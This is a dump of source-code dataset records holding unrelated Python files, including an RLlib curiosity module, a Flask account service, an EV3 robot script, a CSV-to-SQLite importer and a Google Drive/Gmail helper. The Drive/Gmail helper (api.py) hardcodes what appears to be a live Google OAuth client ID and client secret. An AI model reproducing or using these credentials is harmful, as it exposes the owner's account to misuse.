more?\n\tmodel.save_word2vec_format(args.output) #python 2.7\n\treturn\n\n\ndef main(args):\n\t\"\"\"\n\tPipeline for representational learning for all nodes in a graph.\n\t\"\"\"\n\tnx_g = read_graph()\n\tlog.debug(\"Extracted graph with {}\".format(nx_g))\n\tg = n2v.hetnode2vec.Graph(nx_g, args.directed, args.p, args.q, args.gamma, True) # gamma is a parameter when we traverse\n\t# from one nodetype to another nodetype. Change True to False if you don't want to use the modified get-alias_adgen2v\n\tlog.info(\"Done: preprocess transition probabilities \")\n\twalks = g.simulate_walks(args.num_walks, args.walk_length)\n\tlearn_embeddings(walks)\n\n\nif __name__ == \"__main__\":\n\tlog.debug(\"starting execution of run_n2v.py\")\n\targs = parse_args()\n\toutput_args_to_logger(args)\n\tmain(args)\n","sub_path":"create_hn2v_embedding.py","file_name":"create_hn2v_embedding.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546288068","text":"from http import MediaType\n\ndef renderer(format, mimetypes=(), priority=0, name=None):\n \"\"\"\n Decorates a view method to say that it renders a particular format and mimetypes.\n\n Use as:\n @renderer(format=\"foo\")\n def render_foo(self, request, context, template_name): ...\n or\n @renderer(format=\"foo\", mimetypes=(\"application/x-foo\",))\n def render_foo(self, request, context, template_name): ...\n \n The former case will inherit mimetypes from the previous renderer for that\n format in the MRO. 
Where there isn't one, it will default to the empty\n tuple.\n\n Takes an optional priority argument to resolve ties between renderers.\n \"\"\"\n\n def g(f):\n f.is_renderer = True\n f.format = format\n f.mimetypes = set(MediaType(mimetype, priority) for mimetype in mimetypes)\n f.name = name\n f.priority = priority\n return f\n return g","sub_path":"django_conneg/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"53880135","text":"from gym.spaces import Discrete, Space\nfrom typing import Optional, Tuple, Union\n\nfrom ray.rllib.models.action_dist import ActionDistribution\nfrom ray.rllib.models.catalog import ModelCatalog\nfrom ray.rllib.models.modelv2 import ModelV2\nfrom ray.rllib.models.torch.misc import SlimFC\nfrom ray.rllib.models.torch.torch_action_dist import TorchCategorical\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils.exploration.exploration import Exploration\nfrom ray.rllib.utils.framework import try_import_torch, TensorType\nfrom ray.rllib.utils.from_config import from_config\nfrom ray.rllib.utils.typing import FromConfigSpec, ModelConfigDict, \\\n SampleBatchType\n\ntorch, nn = try_import_torch()\nF = None\nif nn is not None:\n F = nn.functional\n\n\nclass Curiosity(Exploration):\n \"\"\"Implementation of:\n [1] Curiosity-driven Exploration by Self-supervised Prediction\n Pathak, Agrawal, Efros, and Darrell - UC Berkeley - ICML 2017.\n https://arxiv.org/pdf/1705.05363.pdf\n\n Learns a simplified model of the environment based on three networks:\n 1) Embedding observations into latent space (\"feature\" network).\n 2) Predicting the action, given two consecutive embedded observations\n (\"inverse\" network).\n 3) Predicting the next embedded obs, given an obs and action\n (\"forward\" network).\n\n The less the agent is able to predict the actually observed next feature\n vector, given obs and action (through the forwards network), the larger the\n \"intrinsic reward\", which will be added to the extrinsic reward.\n Therefore, if a state transition was unexpected, the agent becomes\n \"curious\" and will further explore this transition leading to better\n exploration in sparse rewards environments.\n \"\"\"\n\n def __init__(self,\n action_space: Space,\n *,\n framework: str,\n model: ModelV2,\n feature_dim: int = 288,\n feature_net_config: Optional[ModelConfigDict] = None,\n inverse_net_hiddens: Tuple[int] = (256, ),\n inverse_net_activation: str = \"relu\",\n forward_net_hiddens: Tuple[int] = (256, ),\n forward_net_activation: str = \"relu\",\n beta: float = 0.2,\n eta: float = 1.0,\n lr: float = 1e-3,\n sub_exploration: Optional[FromConfigSpec] = None,\n **kwargs):\n \"\"\"Initializes a Curiosity object.\n\n Uses as defaults the hyperparameters described in [1].\n\n Args:\n feature_dim (int): The dimensionality of the feature (phi)\n vectors.\n feature_net_config (Optional[ModelConfigDict]): Optional model\n configuration for the feature network, producing feature\n vectors (phi) from observations. 
This can be used to configure\n fcnet- or conv_net setups to properly process any observation\n space.\n inverse_net_hiddens (Tuple[int]): Tuple of the layer sizes of the\n inverse (action predicting) NN head (on top of the feature\n outputs for phi and phi').\n inverse_net_activation (str): Activation specifier for the inverse\n net.\n forward_net_hiddens (Tuple[int]): Tuple of the layer sizes of the\n forward (phi' predicting) NN head.\n forward_net_activation (str): Activation specifier for the forward\n net.\n beta (float): Weight for the forward loss (over the inverse loss,\n which gets weight=1.0-beta) in the common loss term.\n eta (float): Weight for intrinsic rewards before being added to\n extrinsic ones.\n lr (float): The learning rate for the curiosity-specific\n optimizer, optimizing feature-, inverse-, and forward nets.\n sub_exploration (Optional[FromConfigSpec]): The config dict for\n the underlying Exploration to use (e.g. epsilon-greedy for\n DQN). If None, uses the FromSpecDict provided in the Policy's\n default config.\n \"\"\"\n if framework != \"torch\":\n raise ValueError(\"Only torch is currently supported for Curiosity\")\n elif not isinstance(action_space, Discrete):\n raise ValueError(\n \"Only Discrete action spaces supported for Curiosity so far.\")\n\n super().__init__(\n action_space, model=model, framework=framework, **kwargs)\n\n self.feature_dim = feature_dim\n if feature_net_config is None:\n feature_net_config = self.policy_config[\"model\"].copy()\n self.feature_net_config = feature_net_config\n self.inverse_net_hiddens = inverse_net_hiddens\n self.inverse_net_activation = inverse_net_activation\n self.forward_net_hiddens = forward_net_hiddens\n self.forward_net_activation = forward_net_activation\n\n self.beta = beta\n self.eta = eta\n self.lr = lr\n # TODO: (sven) if sub_exploration is None, use Trainer's default\n # Exploration config.\n if sub_exploration is None:\n raise NotImplementedError\n self.sub_exploration = sub_exploration\n\n # Creates modules/layers inside the actual ModelV2.\n self._curiosity_feature_net = ModelCatalog.get_model_v2(\n self.model.obs_space,\n self.action_space,\n self.feature_dim,\n model_config=self.feature_net_config,\n framework=self.framework,\n name=\"feature_net\",\n )\n\n self._curiosity_inverse_fcnet = self._create_fc_net(\n [2 * self.feature_dim] + list(self.inverse_net_hiddens) +\n [self.action_space.n], self.inverse_net_activation)\n\n self._curiosity_forward_fcnet = self._create_fc_net(\n [self.feature_dim + self.action_space.n\n ] + list(forward_net_hiddens) + [self.feature_dim],\n self.forward_net_activation)\n\n # This is only used to select the correct action\n self.exploration_submodule = from_config(\n cls=Exploration,\n config=self.sub_exploration,\n action_space=self.action_space,\n framework=self.framework,\n policy_config=self.policy_config,\n model=self.model,\n num_workers=self.num_workers,\n worker_index=self.worker_index,\n )\n\n @override(Exploration)\n def get_exploration_action(self,\n *,\n action_distribution: ActionDistribution,\n timestep: Union[int, TensorType],\n explore: bool = True):\n # Simply delegate to sub-Exploration module.\n return self.exploration_submodule.get_exploration_action(\n action_distribution=action_distribution,\n timestep=timestep,\n explore=explore)\n\n @override(Exploration)\n def get_exploration_optimizer(self, optimizers):\n feature_params = list(self._curiosity_feature_net.parameters())\n inverse_params = list(self._curiosity_inverse_fcnet.parameters())\n 
forward_params = list(self._curiosity_forward_fcnet.parameters())\n\n # Now that the Policy's own optimizer(s) have been created (from\n # the Model parameters (IMPORTANT: w/o(!) the curiosity params),\n # we can add our curiosity sub-modules to the Policy's Model.\n self.model._curiosity_feature_net = \\\n self._curiosity_feature_net.to(self.device)\n self.model._curiosity_inverse_fcnet = \\\n self._curiosity_inverse_fcnet.to(self.device)\n self.model._curiosity_forward_fcnet = \\\n self._curiosity_forward_fcnet.to(self.device)\n\n # Add the Adam for curiosity NN updating to the Policy's optimizers.\n return optimizers + [\n torch.optim.Adam(\n forward_params + inverse_params + feature_params, lr=self.lr)\n ]\n\n @override(Exploration)\n def postprocess_trajectory(self, policy, sample_batch, tf_sess=None):\n \"\"\"Calculates phi values (obs, obs', and predicted obs') and ri.\n\n Stores calculated phi, phi' and predicted phi' as well as the intrinsic\n rewards in the batch for loss processing by the policy.\n \"\"\"\n batch_size = sample_batch[SampleBatch.OBS].shape[0]\n phis, _ = self.model._curiosity_feature_net({\n SampleBatch.OBS: torch.cat([\n torch.from_numpy(sample_batch[SampleBatch.OBS]),\n torch.from_numpy(sample_batch[SampleBatch.NEXT_OBS])\n ])\n })\n phi, next_phi = phis[:batch_size], phis[batch_size:]\n\n # Detach phi from graph (should not backpropagate through feature net\n # for forward-loss).\n predicted_next_phi = self.model._curiosity_forward_fcnet(\n torch.cat(\n [\n phi.detach(),\n F.one_hot(\n torch.from_numpy(\n sample_batch[SampleBatch.ACTIONS]).long(),\n num_classes=self.action_space.n).float()\n ],\n dim=-1))\n\n # Forward loss term (predicted phi', given phi and action vs actually\n # observed phi').\n forward_l2_norm_sqared = 0.5 * torch.sum(\n torch.pow(predicted_next_phi - next_phi, 2.0), dim=-1)\n # Scale forward loss by eta hyper-parameter.\n sample_batch[SampleBatch.REWARDS] = \\\n sample_batch[SampleBatch.REWARDS] + \\\n self.eta * forward_l2_norm_sqared.detach().cpu().numpy()\n return sample_batch\n\n @override(Exploration)\n def get_exploration_loss(self, policy_loss, train_batch: SampleBatchType):\n \"\"\"Adds the loss for the inverse and forward models to policy_loss.\n \"\"\"\n batch_size = train_batch[SampleBatch.OBS].shape[0]\n phis, _ = self.model._curiosity_feature_net({\n SampleBatch.OBS: torch.cat(\n [\n train_batch[SampleBatch.OBS],\n train_batch[SampleBatch.NEXT_OBS]\n ],\n dim=0)\n })\n phi, next_phi = phis[:batch_size], phis[batch_size:]\n # Inverse loss term (prediced action that led from phi to phi' vs\n # actual action taken).\n phi_next_phi = torch.cat([phi, next_phi], dim=-1)\n dist_inputs = self.model._curiosity_inverse_fcnet(phi_next_phi)\n action_dist = TorchCategorical(dist_inputs, self.model)\n # Neg log(p); p=probability of observed action given the inverse-NN\n # predicted action distribution.\n inverse_loss = -action_dist.logp(train_batch[SampleBatch.ACTIONS])\n inverse_loss = torch.mean(inverse_loss)\n\n # Forward loss term has already been calculated during train batch pre-\n # processing (just have to weight with beta here).\n predicted_next_phi = self.model._curiosity_forward_fcnet(\n torch.cat(\n [\n phi,\n F.one_hot(\n train_batch[SampleBatch.ACTIONS].long(),\n num_classes=self.action_space.n).float()\n ],\n dim=-1))\n forward_loss = torch.mean(0.5 * torch.sum(\n torch.pow(predicted_next_phi - next_phi, 2.0), dim=-1))\n\n # Append our loss to the policy loss(es).\n return policy_loss + [\n (1.0 - self.beta) * inverse_loss 
+ self.beta * forward_loss\n ]\n\n def _create_fc_net(self, layer_dims, activation):\n \"\"\"Given a list of layer dimensions (incl. input-dim), creates FC-net.\n\n Args:\n layer_dims (Tuple[int]): Tuple of layer dims, including the input\n dimension.\n activation (str): An activation specifier string (e.g. \"relu\").\n\n\n Examples:\n If layer_dims is [4,8,6] we'll have a two layer net: 4->8 and 8->6.\n \"\"\"\n layers = []\n for i in range(len(layer_dims) - 1):\n act = activation if i < len(layer_dims) - 2 else None\n layers.append(\n SlimFC(\n in_size=layer_dims[i],\n out_size=layer_dims[i + 1],\n activation_fn=act))\n return nn.Sequential(*layers)\n","sub_path":"rllib/utils/exploration/curiosity.py","file_name":"curiosity.py","file_ext":"py","file_size_in_byte":12491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"325977027","text":"from datetime import datetime\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_smorest import abort\n\nfrom app.main import db\nfrom app.main.service.generic_service import GenericService\nfrom app.main.model.account_model import Account\n\n\nclass AccountService(GenericService):\n\n @classmethod\n def read_all(cls):\n \"\"\"\n Read all accounts.\n\n Returns:\n List of accounts.\n \"\"\"\n return Account.query.all()\n\n @classmethod\n def read_all_by_user(cls, data):\n \"\"\"\n Read all accounts of a user.\n\n Params:\n data - deserialized request data (Immutable dict)\n\n Returns:\n List of accounts of the user.\n \"\"\"\n super().validate_user_permission_on_input(data, 'user_id')\n\n return Account.query.filter(Account.user_id == data['user_id']).all()\n\n @classmethod\n def create(cls, data):\n \"\"\"\n Create a new account.\n\n Params:\n data - deserialized request data (Immutable dict)\n\n Returns:\n Created account.\n \"\"\"\n account = Account.query.filter((Account.user_id == get_jwt_identity()) & (Account.name == data['name'])).first()\n\n if not account:\n new_account = Account(**data)\n new_account.user_id = get_jwt_identity()\n new_account.setup_date = new_account.last_update = datetime.utcnow()\n\n db.session.add(new_account)\n db.session.commit()\n\n return new_account\n else:\n abort(409, msg='Account already exists.')\n\n @classmethod\n def update(cls, data, id):\n \"\"\"\n Update an account by id.\n\n Params:\n id - id of account to update\n data - deserialized request data (Immutable dict)\n\n Returns:\n Updated account.\n \"\"\"\n print(data)\n account = Account.query.filter(Account.id == id).first()\n\n super().validate_user_permission_on_result(account, Account, 'user_id')\n\n for k, v in data.items():\n setattr(account, k, v)\n account.last_update = datetime.utcnow()\n\n db.session.add(account)\n db.session.commit()\n\n return account\n\n @classmethod\n def read(cls, id):\n \"\"\"\n Read an account by id.\n\n Params:\n id - id of account to get from database\n\n Returns:\n Retrieved account.\n \"\"\"\n account = Account.query.filter(Account.id == id).first()\n\n super().validate_user_permission_on_result(account, Account, 'user_id')\n\n return account\n\n @classmethod\n def delete(cls, id):\n \"\"\"\n Delete an account by id.\n\n Params:\n id - id of account to delete from database\n\n Returns:\n Deleted account.\n \"\"\"\n account = Account.query.filter(Account.id == id).first()\n\n super().validate_user_permission_on_result(account, Account, 'user_id')\n\n db.session.delete(account)\n db.session.commit()\n\n return 
account\n","sub_path":"app/main/service/account_service.py","file_name":"account_service.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"605055114","text":"from rest_framework import serializers\nfrom .models import Render\n\n\nclass RenderSerializer(serializers.ModelSerializer):\n output_url = serializers.CharField(source='get_output_url', read_only=True)\n\n class Meta:\n model = Render\n fields = ('id', 'source_type', 'source_id', 'created_at', 'state', 'output_url', 'logs')\n read_only_fields = ('id', 'created_at', 'state', 'output_url', 'logs')\n","sub_path":"arxiv_html/renders/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291927349","text":"#!/usr/bin/env python3\n# (MicroPython does not yet support Display as of 2020)\n\n\nfrom ev3dev.ev3 import (\n Motor, LargeMotor, MediumMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, \n InfraredSensor, INPUT_4,\n Screen, Sound\n)\n\nfrom PIL import Image\nfrom time import sleep\n\n\nMEDIUM_MOTOR = MediumMotor(address=OUTPUT_A)\nLEFT_MOTOR = LargeMotor(address=OUTPUT_B)\nRIGHT_MOTOR = LargeMotor(address=OUTPUT_C)\n\nIR_SENSOR = InfraredSensor(address=INPUT_4)\n\nSCREEN = Screen()\nSPEAKER = Sound()\n\n\nMEDIUM_MOTOR.run_timed(\n speed_sp=-200, # deg/s\n time_sp=1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\nMEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n\nwhile True:\n if IR_SENSOR.proximity < 25:\n SCREEN.image.paste(im=Image.open('/home/robot/image/Pinch right.bmp'))\n SCREEN.update()\n\n LEFT_MOTOR.run_to_rel_pos(\n speed_sp=750, # degrees/second\n position_sp=-1000, # degrees\n stop_action=Motor.STOP_ACTION_HOLD)\n RIGHT_MOTOR.run_to_rel_pos(\n speed_sp=750, # degrees/second\n position_sp=1000, # degrees\n stop_action=Motor.STOP_ACTION_HOLD)\n LEFT_MOTOR.wait_while(Motor.STATE_RUNNING)\n RIGHT_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n SCREEN.image.paste(im=Image.open('/home/robot/image/Angry.bmp'))\n SCREEN.update()\n \n MEDIUM_MOTOR.run_timed(\n speed_sp=1000, # deg/s\n time_sp=0.3 * 1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n SPEAKER.play(wav_file='/home/robot/sound/Laughing 2.wav').wait()\n\n MEDIUM_MOTOR.run_timed(\n speed_sp=-200, # deg/s\n time_sp=1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n else:\n SCREEN.image.paste(im=Image.open('/home/robot/image/Crazy 1.bmp'))\n SCREEN.update()\n \n LEFT_MOTOR.run_forever(speed_sp=750)\n RIGHT_MOTOR.run_forever(speed_sp=750)\n\n MEDIUM_MOTOR.run_timed(\n speed_sp=750, # deg/s\n time_sp=0.1 * 1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n sleep(0.1)\n\n SCREEN.image.paste(im=Image.open('/home/robot/image/Crazy 2.bmp'))\n SCREEN.update()\n\n # LEFT_MOTOR.run_forever(speed_sp=750)\n RIGHT_MOTOR.stop(stop_action=Motor.STOP_ACTION_HOLD)\n\n MEDIUM_MOTOR.run_timed(\n speed_sp=-300, # deg/s (-100 too soft)\n time_sp=0.2 * 1000, # ms \n stop_action=Motor.STOP_ACTION_COAST)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n","sub_path":"Computing-Platforms/EV3/Home-Edition/Core-Robots/Track3r/Track3r-4.EV3Dev1.py","file_name":"Track3r-4.EV3Dev1.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"153550038","text":"\n#!/usr/bin/env python3.4\n# ---------------------------------------------------------------------------- #\nimport os, glob, sqlite3, subprocess, Constants\nimport pandas as pd\nfrom pandas.io import sql\nfrom tqdm import tqdm\n# ---------------------------------------------------------------------------- #\nos.chdir('../../../../Desktop/')\nCSVFiles = glob.glob('*.csv')\n# ---------------------------------------------------------------------------- #\ntable_name = 'Premierworks' # name table\nitersize = 100000 # number of lines to process at each iteration\n# ---------------------------------------------------------------------------- #\ndef CSVtoSQLiteImport():\n    for file in CSVFiles:\n        CSVLineCount = subprocess.check_output(['wc','-l',file])\n        CSVLineCount = int(CSVLineCount.split()[0])\n        # str.strip('.csv') would drop any leading/trailing '.', 'c', 's', 'v'\n        # characters rather than the extension, so split the extension off instead\n        filename = os.path.splitext(file)[0]\n        ConSQLiteDB = sqlite3.connect('{}_SQLite3.db'.format(filename))\n        for row in tqdm(range(1,CSVLineCount,itersize)):\n            DataFrame = pd.read_csv(\n                file,\n                header = None,\n                nrows = itersize,\n                skiprows = row,\n                low_memory = False\n            )\n            DataFrame.columns = Constants.HeaderRowMain\n            sql.to_sql(\n                DataFrame,\n                name = table_name,\n                con = ConSQLiteDB,\n                index = False,\n                index_label = 'CustomerID',\n                if_exists = 'append'\n            )\n        ConSQLiteDB.close()\n\nif __name__ == '__main__':\n    CSVtoSQLiteImport()\n","sub_path":"ImportCSVtoSQLite.py","file_name":"ImportCSVtoSQLite.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"186951062","text":"from google.oauth2 import service_account\nfrom googleapiclient.http import MediaIoBaseDownload, MediaFileUpload\nfrom googleapiclient.discovery import build\nimport io\nimport pickle\nimport requests\nimport os\nimport os.path\nimport platform\nimport mimetypes\nimport base64\nfrom apiclient import errors\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nimport pprint as pp\nimport json\nimport datetime\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\n\nSCOPES = ['https://www.googleapis.com/auth/drive',\n          'https://www.googleapis.com/auth/gmail.send']\nSERVICE_ACCOUNT_FILE = 'Emotions_Project-481579272f6a.json'\nEMAIL_ACCOUNT_FILE = 'email_credentials.json'\nNVR_ACCOUNT_FILE = 'nvr_cred.json'\nnvr_server = 'https://nvr.miem.hse.ru/api/gdrive-upload'\nnvr_key = 'https://nvr.miem.hse.ru/api/gdrive-upload/504'\nGOOGLE_DISCOVERY_URL = \"https://accounts.google.com/.well-known/openid-configuration\"\nGOOGLE_CLIENT_ID = '332884163839-cgsk3ta79lgoo2o2otcb2h8ck28cd1if.apps.googleusercontent.com'\nGOOGLE_CLIENT_SECRET = 'bIb1mKNZH18LC5lSeDj1QTMk'\n\nEMAIL_FROM = \"noreply@facerecognizer.com\"\n\ncredentials = None\nservice = None\n# credentials = service_account.Credentials.from_service_account_file(SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n# # email_cred = service_account.Credentials.from_service_account_file(EMAIL_ACCOUNT_FILE, scopes=SCOPES)\n# service = build('drive', 'v3', credentials=credentials)\n# with open('Emotions_Project-481579272f6a.json', 'r') as j:\n#     data = json.load(j)\n\n\n# delegated_credentials = credentials.with_subject(EMAIL_FROM)\n# service = build('gmail', 'v1', credentials=delegated_credentials)\n\n# credentials = service_account.Credentials.from_service_account_file(NVR_ACCOUNT_FILE, 
scopes=SCOPES)\n# service = build('drive', 'v3', credentials=credentials)\n\n\ndef look_into_drive(dict_id, name_contains=None):\n if name_contains is None:\n return service.files().list(pageSize=100,\n fields=\"nextPageToken, files(id, name, mimeType, parents, createdTime, permissions, quotaBytesUsed)\",\n q=\"'\" + dict_id + \"' in parents\").execute()\n return service.files().list(pageSize=100,\n fields=\"nextPageToken, files(id, name, mimeType, parents, createdTime, permissions, quotaBytesUsed)\",\n q=\"'\" + dict_id + \"' in parents and name contains '\" + name_contains + \"'\").execute()\n\n\ndef download_video_nvr(room, date, time, filename=None, need_folder=False):\n try:\n rooms = pickle.loads(open(\"rooms.pickle\", \"rb\").read())\n except:\n raise Exception(\"No file containing rooms' ids\")\n room_id = rooms[room][0]\n tag = rooms[room][1]\n results = look_into_drive(room_id, date)\n if len(results['files']) > 1:\n raise Exception(\"More then one directory on Google drive\")\n elif len(results['files']) == 0:\n raise Exception(\"No files found on drive\")\n time_id = results['files'][0]['id']\n results = look_into_drive(time_id, time)\n if len(results['files']) > 1:\n raise Exception(\"More then one directory on Google drive\")\n elif len(results['files']) == 0:\n raise Exception(\"No files found on drive\")\n if tag is not None:\n results = look_into_drive(results['files'][0]['id'], date + \"_\" + time + \"_\" + room + \"_\" + tag)\n if filename is None:\n [hour, minute] = time.split(\":\")\n filename = \"queue/\" + date + \"_\" + hour + \"-\" + minute + \"_\" + room + \"_\" + tag + \".mp4\"\n if len(results['files']) > 1:\n raise Exception(\"More then one file on Google drive\")\n elif len(results['files']) == 0:\n raise Exception(\"No files found on drive\")\n request = service.files().get_media(fileId=results['files'][0]['id'])\n fh = io.FileIO(filename, 'wb')\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while not done:\n status, done = downloader.next_chunk()\n print(\"Download process is %d%%. 
\" % int(status.progress() * 100))\n\n if need_folder:\n return filename, results['files'][0]['parents']\n else:\n return filename\n\n\ndef upload_video(filename, upload_name, folder_id=None, room_num=None):\n if folder_id is not None:\n file_metadata = {'name': upload_name, 'parents': [folder_id]}\n media = MediaFileUpload(filename, resumable=True)\n r = service.files().create(body=file_metadata, media_body=media, fields='id').execute()\n print(r)\n return r\n elif room_num is not None:\n if platform.system() != \"Windows\":\n old_string = filename\n _dir, old_string = old_string.split(\"/\")\n old_string = old_string.split(\".\")[0]\n d = datetime.datetime.strptime(old_string, \"%Y-%m-%d_%H-%M\")\n new_string = _dir + \"/\" + d.strftime(\"%Y-%m-%d_%H:%M\") + \".mp4\"\n os.rename(filename, new_string)\n filename = new_string\n file = open(filename, 'rb')\n files = {'file': file}\n res = requests.post(nvr_server + \"/\" + room_num, files=files, headers=nvr_key)\n\n return res.status_code\n\n\ndef edit_rooms(rooms, ids, tags):\n staff = zip(ids, tags)\n staff = dict(zip(rooms, staff))\n f = open(\"rooms.pickle\", \"wb\")\n f.write(pickle.dumps(staff))\n\n\ndef create_message(sender, to, subject, message_text, file=None):\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n msg = MIMEText(message_text)\n message.attach(msg)\n\n if file is not None:\n content_type, encoding = mimetypes.guess_type(file)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n main_type, sub_type = content_type.split('/', 1)\n if main_type == 'text':\n fp = open(file, 'rb')\n msg = MIMEText(fp.read(), _subtype=sub_type)\n fp.close()\n elif main_type == 'image':\n fp = open(file, 'rb')\n msg = MIMEImage(fp.read(), _subtype=sub_type)\n fp.close()\n elif main_type == 'audio':\n fp = open(file, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=sub_type)\n fp.close()\n else:\n fp = open(file, 'rb')\n msg = MIMEBase(main_type, sub_type)\n msg.set_payload(fp.read())\n fp.close()\n filename = os.path.basename(file)\n msg.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(msg)\n\n return {'raw': base64.urlsafe_b64encode(message.as_string().encode()).decode()}\n\n\ndef send_message(user_id, message):\n \"\"\"Send an email message.\n Args:\n service: Authorized Gmail API service instance.\n user_id: User's email address. 
The special value \"me\"\n can be used to indicate the authenticated user.\n message: Message to be sent.\n Returns:\n Sent Message.\n \"\"\"\n try:\n service = get_service('token.pickle')\n message = (service.users().messages().send(userId=user_id, body=message).execute())\n print('Message Id: %s' % message['id'])\n return message\n\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n\n\ndef build_service():\n \"\"\"Shows basic usage of the Gmail API.\n Lists the user's Gmail labels.\n \"\"\"\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n f\"{EMAIL_ACCOUNT_FILE}\", SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n return service\n\n\ndef get_service(path):\n with open(rf'{path}', 'rb') as token:\n creds = pickle.load(token)\n service = build('gmail', 'v1', credentials=creds)\n return service\n\n\ndef send_file_with_email(to:str, subject:str, message_text, file=None):\n # email_service = get_service('token.pickle')\n message = create_message(EMAIL_FROM, to, subject, message_text, file)\n send_message('me', message)\n\n\ndef get_google_provider_cfg():\n return requests.get(GOOGLE_DISCOVERY_URL).json()\n\n\n# send_file_with_email('iasizykh@miem.hse.ru', 'Test', 'Test')\n# build_service()\n\n# message = create_message(EMAIL_FROM, 'iasizykh@miem.hse.ru', 'Test', 'Testment')\n# send_message('me', message)\n# pp = pp.PrettyPrinter(indent=4)\n\n# r = upload_video(\"video_output/twice.mp4\", \"twice.mp4\", folder_id=\"14Xsw4xk6vUFINsyy1OH5937Rq98W4JHw\")\n# print(r)\n# now = datetime.datetime.now()\n# today = now.strftime('%Y-%m-%d')\n#\n# filename, results = download_video_nvr('504', '2020-07-12', '12:00')\n# results = upload_video('1zAPs-2GP_SQj6tHLWwgohjuwCS_7o3yu', 'Webcam.mp4')\n# pp.pprint(results)\n\n\n# rooms = ['504', '520', '305', '505a', '307', '306']\n# ids = ['1zAPs-2GP_SQj6tHLWwgohjuwCS_7o3yu', '1hjRds9U673yqZq6sjPuoLT3R0-zzr-B3', '1i3j8a60gk-RtX6vS3md8q98xtbc5VSk-',\n# '14JWOQs_dW8aIHpQZfO-KQ9HKQVqrwLN9', '1qZNnDJpIBZI52CcEcwAJP69QR9LyIPi2', '1INi7xUvLhPJW0as3HO8ugdCgsO-HwfxB']\n# tags = ['26', None, '54', None, None, None]\n# edit_rooms(rooms, ids, tags)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89050081","text":"#!/usr/bin/env python3\n\"\"\" FastText \"\"\"\nfrom gensim.models import FastText\n\n\ndef fasttext_model(sentences, size=100, min_count=5, negative=5,\n window=5, cbow=True, iterations=5, seed=0, workers=1):\n \"\"\" creates and trains a gensim word2vec model.\n Args:\n sentences: (list) list of sentences to be trained on.\n size: (int) the dimensionality of the embedding layer.\n min_count: (int) the minimum number of occurrences\n of a word for use in training.\n negative: the size of negative sampling.\n window: (int) the maximum distance between 
the current\n and predicted word within a sentence.\n cbow: (bool) a boolean to determine the training type;\n True is for CBOW; False is for Skip-gram.\n iterations: (int) the number of iterations to train over.\n seed: (int) the seed for the random number generator.\n workers: (int) the number of worker threads to train the model.\n Returns:\n the trained model.\n \"\"\"\n if cbow:\n sg = 0\n else:\n sg = 1\n model = FastText(sentences=sentences, size=size, min_count=min_count,\n window=window, negative=negative, sg=sg,\n iter=iterations, seed=seed, workers=workers)\n model.train(sentences, total_examples=model.corpus_count,\n epochs=model.epochs)\n\n return model\n","sub_path":"supervised_learning/0x0F-word_embeddings/4-fasttext.py","file_name":"4-fasttext.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129551431","text":"#!/usr/bin/env python3\n\n'''\nWritten by Lucas J. Hyland 2021/09/21\nUniversity of Tasmania, Australia\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport struct, os, math, random, matplotlib, datetime, argparse, difflib\nfrom matplotlib import rc, font_manager\nfrom numpy import pi, arcsin, cos, sin, percentile, exp\n\nfrom mpl_toolkits.basemap import Basemap\n\nfrom 